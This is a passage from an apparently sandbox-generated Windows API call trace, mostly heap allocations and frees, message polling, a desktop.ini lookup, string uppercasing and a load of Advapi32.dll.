hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0215.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0215.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0215.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0215.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.656] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0215.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0215.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0215.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0215.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0215.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0215.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0215.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0215.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0215.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0215.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0215.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0215.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0215.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0215.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0215.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0215.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0215.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0215.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0215.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0215.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0215.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0215.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0215.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0215.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0215.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0215.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0215.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0215.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0215.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0215.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0215.658] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0215.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0215.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0215.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0215.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0215.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0215.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0215.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0215.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0215.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0215.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0215.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0215.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0215.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.658] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0215.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0215.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0215.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0215.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0215.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0215.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0215.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0215.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0215.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0215.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0215.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0215.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0215.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0215.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0215.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0215.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0215.659] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/desktop.ini", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440c5760, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440c5760, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce494f1d, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0x9e1d38 [0215.659] FindClose (in: hFindFile=0x9e1d38 | out: hFindFile=0x9e1d38) returned 1 [0215.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0215.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0215.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0215.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0215.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0215.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0215.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0215.660] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0215.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0215.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0215.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0215.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0215.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0215.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0215.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0215.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0215.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0215.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0215.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0215.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0215.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0215.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0215.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0215.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0215.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0215.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0215.662] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.662] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0215.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0215.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0215.662] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0215.662] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0215.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0215.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0215.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0215.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0215.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0215.662] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0215.662] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.662] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0215.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0215.662] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0215.662] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0215.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0215.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0215.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0215.663] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0215.663] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0215.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0215.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0215.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0215.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0215.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0215.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0215.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0215.663] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0215.664] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0215.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0215.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0215.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0215.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0215.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0215.665] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0215.665] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.665] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0215.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0215.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0215.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0215.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.665] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0215.665] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0215.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0215.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0215.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0215.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0215.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0215.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0215.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0215.665] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0215.665] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: 